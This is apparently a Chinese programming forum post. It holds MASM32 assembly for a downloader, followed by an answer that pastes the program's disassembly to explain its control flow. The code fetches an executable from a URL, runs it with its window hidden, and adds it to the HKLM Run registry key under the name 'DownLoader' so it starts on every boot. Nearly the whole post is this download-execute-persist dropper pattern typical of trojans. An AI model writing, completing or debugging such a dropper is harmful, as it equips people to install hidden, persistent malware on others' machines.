.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\urlmon.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\urlmon.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
.data
URL db "http://127.0.0.1/xxx.exe ",0
EXE db "d:\xxx.exe ",0;
szRegKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run ",0
szRegValue db "DownLoader ",0
.code
start:
invoke URLDownloadToFile,NULL,addr URL,addr EXE,0,0;
invoke WinExec,addr EXE,0;
_EnumKey proc _lpKey
local @hKey,@dwIndex,@dwLastTime:FILETIME
invoke RegCreateKey,HKEY_LOCAL_MACHINE,offset szRegKey,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szRegValue,NULL,\
REG_SZ,addr EXE,10 ;写入一个REG_SZ类型的数据
invoke RegCloseKey,@hKey
.endif
ret
_EnumKey endp
invoke _EnumKey,NULL;
invoke ExitProcess,NULL;
end start
------解决方案--------------------------------------------------------
我把你的反汇编代码贴出来,你或许就清楚了。
00401000 > /$ 6A 00 push 0
00401002 |. 6A 00 push 0
00401004 |. 68 19304000 push 00403019 ; ASCII "d:\xxx.exe "
00401009 |. 68 00304000 push 00403000 ; ASCII "http://127.0.0.1/xxx.exe "
0040100E |. 6A 00 push 0
00401010 |. E8 67000000 call <jmp.&urlmon.URLDownloadToFileA>
00401015 |. 6A 00 push 0 ; /ShowState = SW_HIDE
00401017 |. 68 19304000 push 00403019 ; |CmdLine = "d:\xxx.exe "
0040101C |. E8 55000000 call <jmp.&kernel32.WinExec> ; \WinExec
00401021 |$ 55 push ebp
00401022 |. 8BEC mov ebp, esp
00401024 |. 83C4 F0 add esp, -10
00401027 |. 8D45 FC lea eax, [ebp-4]
0040102A |. 50 push eax ; /pHandle
0040102B |. 68 24304000 push 00403024 ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run "
00401030 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401035 |. E8 4E000000 call <jmp.&advapi32.RegCreateKeyA> ; \RegCreateKeyA
0040103A |. 0BC0 or eax, eax
0040103C |. 75 20 jnz short 0040105E
0040103E |. 6A 0A push 0A ; /BufSize = A (10.)